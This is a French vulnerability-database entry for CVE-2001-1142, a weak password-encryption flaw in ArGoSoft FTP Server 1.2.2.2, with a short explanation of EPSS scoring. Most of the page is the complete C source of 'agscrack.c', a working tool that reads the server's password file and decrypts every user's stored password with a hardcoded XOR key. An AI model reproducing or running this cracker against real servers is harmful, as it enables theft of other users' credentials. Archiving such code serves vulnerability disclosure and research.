CVE-2001-1142 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

// source: https://www.securityfocus.com/bid/3029/info ArGoSoft FTP server is an FTP server for the Windows platform. A design error exists in ArGoSoft FTP which enables an authenticated user to view other users encrypted passwords. However due to a weak encryption scheme it is possible for a user to decrypt the password using a third party utility. /******************************************************************** * agscrack.c - ArGoSoft FTP Server 1.2.2.2 password file cracker * * by [ByteRage] <[email protected]> [http://www.byterage.cjb.net] * ********************************************************************/ #include <string.h> #include <stdio.h> int len; FILE *fh; /* DECRYPTION ALGORITHMS */ unsigned char char2bin(unsigned char inbyte) { if ((inbyte >= 'A') && (inbyte <= 'Z')) { len++; return(inbyte-'A'); } if ((inbyte >= 'a') && (inbyte <= 'z')) { len++; return(inbyte-'a'+26); } if ((inbyte >= '0') && (inbyte <= '9')) { len++; return(inbyte+4); } if (inbyte == '+') { len++; return('\x3E'); } if (inbyte == '/') { len++; return('\x3F'); } return('\x00'); } void decode(unsigned char chars[], unsigned char bytes[]) { int i,retval=0; for(i=0; i<4; i++) { retval <<= 6; retval |= char2bin(chars[i]); } for(i=0; i<3; i++) { bytes[2-i] = retval & 0xFF; retval >>= 8; } len--; } void decryptpass(unsigned char encrypted[], unsigned char decrypted[]) { const unsigned char heavycrypt0[] = "T3ZlciB0aGUgaGlsbHMgYW5kIGZhciBhd2F5LCBUZWxldHViYmllcyBjb21lIHRvIHBsYXk ="; unsigned int j, k=0, l; len = 0; for(j=0; j<strlen(encrypted); j+=4) { decode(&encrypted[j], &decrypted[k]); for(l=0; l<3; l++) { decrypted[k] ^= heavycrypt0[k++]; } } decrypted[len] = '\x00'; } /* DECRYPTION ALGORITHMS END */ void main(int argc, char ** argv) { char password[128]; /* ArGoSoft's passwords don't get larger than 128 bytes */ char buf[256]; char b; int rd; printf("ArGoSoft FTP Server 1.2.2.2 password file cracker by [ByteRage]\n\n"); if (argc<2) { printf("Syntax : %s <password(file)>\n", argv[0]); return 1; } fh = fopen(argv[1], "rb"); if (!fh) { decryptpass(argv[1], &password); printf("%s -> %s\n", argv[1], password); return 0; } else { /* simple password file processor */ fread(&buf,1,1,fh); if (buf[0] == 4) { while (1) { if (fread(&b,1,1,fh) == 0) { break; } if (fread(&buf,1,b+1,fh) == 0) { break; } printf("%s : ", buf); b=0; while(!b) if (fread(&b,1,1,fh) == 0) { break; } if (fread(&buf,1,b+1,fh) == 0) { break; } decryptpass(&buf, &password); printf("%s -> %s\n", &buf, password); b=0; while(!b) if (fread(&b,1,1,fh) == 0) { break; } if (fread(&buf,1,b+1,fh) == 0) { break; } b=0; while(b!=4) if (fread(&b,1,1,fh) == 0) { break; } } } else printf("error when processing passwordfile!"); fclose(fh); } }